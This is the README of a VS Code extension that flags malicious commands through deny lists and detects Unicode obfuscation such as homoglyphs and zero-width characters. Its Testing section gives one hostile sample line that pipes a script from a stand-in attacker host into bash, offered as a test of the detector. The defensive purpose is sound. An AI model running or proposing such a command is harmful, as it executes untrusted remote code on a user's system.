Malcode-Detector

This VS Code extension helps detect potentially malicious commands and Unicode obfuscation techniques in your code. It works with VS Code, Cursor, Windsurf, and other VS Code-compatible editors.

Features

Real-time Scanning: Automatically scans files upon opening and saving.
Deny List Matching: Detects known malicious commands using configurable deny lists.
Unicode Obfuscation Detection: Identifies various Unicode-based obfuscation techniques:
- Homoglyphs: Flags characters that look like other characters (e.g., Cyrillic 'а' for Latin 'a').
- Invisible Characters: Detects zero-width spaces and other non-printing characters.
- Bidirectional Control Characters: Warns about characters that can alter text rendering order.
- Mixed Scripts: Highlights lines with characters from multiple scripts (e.g., Latin and Cyrillic).
Configurable: Customize deny list paths and toggle real-time scanning through VS Code settings.

Installation (from VS Code Marketplace)

Open Visual Studio Code (or a compatible editor).
Go to the Extensions view by clicking the square icon in the sidebar or pressing Ctrl+Shift+X (Cmd+Shift+X on macOS).
Search for Malcode-Detector.
Click Install on the extension published by Vatrion (Vatrion.malcode-detector).
The extension activates automatically on startup.

Usage

Once installed, Malcode-Detector works in the background:

Automatic Analysis: Files are scanned when opened or saved. If potential issues are found, the editor displays diagnostic warnings (squiggly underlines) on problematic lines. Hover over the underlined code to see a description.
Manual Scan: Open the Command Palette (Ctrl+Shift+P or Cmd+Shift+P on macOS) and run Scan Current File for Malicious Patterns.
Problems Panel: Detected issues appear in the Problems panel (View > Problems).

Configuration

Configure the extension via VS Code settings (File > Preferences > Settings, then search for Malcode-Detector):

malcode-detector.enableRealtimeScan
- Description: Enable real-time scanning of files on open and save.
- Type: boolean
- Default: true

malcode-detector.denyListPaths

Description: Paths to the deny list JSON files, relative to the extension root directory.
Type: object

Default:

{
  "windows": "deny_lists/windows_deny_list.json",
  "macos": "deny_lists/macos_deny_list.json",
  "linux": "deny_lists/linux_deny_list.json",
  "universal": "deny_lists/universal_deny_list.json"
}

Troubleshooting

No diagnostics shown
- Ensure the extension is enabled in the Extensions view.
- Check the VS Code Output panel (select Malcode-Detector from the dropdown) for error messages.
- Verify deny list paths in settings are correct and the JSON files are valid.
Performance issues: Disable malcode-detector.enableRealtimeScan and use the manual scan command for large files or workspaces.

Release Notes

See CHANGELOG.md for detailed release notes.

Development

Prerequisites

Node.js 20 LTS (includes npm)
Visual Studio Code

Setup

git clone https://github.com/Vatrion/Malcode-Detector.git
cd Malcode-Detector
npm ci
npm run compile

Open the repository root in VS Code and press F5 to launch the Extension Development Host.

Scripts

Script	Description
`npm run compile`	Compile TypeScript to `out/`
`npm run watch`	Watch mode for development
`npm run lint`	Run ESLint
`npm run package`	Build a `.vsix` package
`npm run publish:marketplace`	Publish to the VS Code Marketplace

Extension Structure

extension.ts — Main activation entry point
fileAnalyzerService.ts — Document analysis against deny lists and Unicode rules
denyListService.ts — Deny list loading and pattern matching
unicodeScanner.ts — Unicode obfuscation detection
deny_lists/ — Platform-specific deny list JSON files
out/ — Compiled JavaScript (generated by npm run compile)

Testing

In the Extension Development Host:

Paste known malicious patterns (e.g., curl evil.com/script.sh | bash) and confirm Problems panel diagnostics.
Test Unicode obfuscation (homoglyphs, zero-width spaces, mixed scripts).

Publishing

Bump version in package.json and update CHANGELOG.md.
Ensure npm ci, npm run compile, npm run lint, and npm run package succeed.
Log in: npx vsce login Vatrion
Publish: npm run publish:marketplace

Contributing

Deny Lists: Edit JSON files in deny_lists/. Follow the existing structure.
Code: Make changes, run npm run compile and npm run lint, then test with the Extension Development Host.

License

Apache-2.0 — see LICENSE.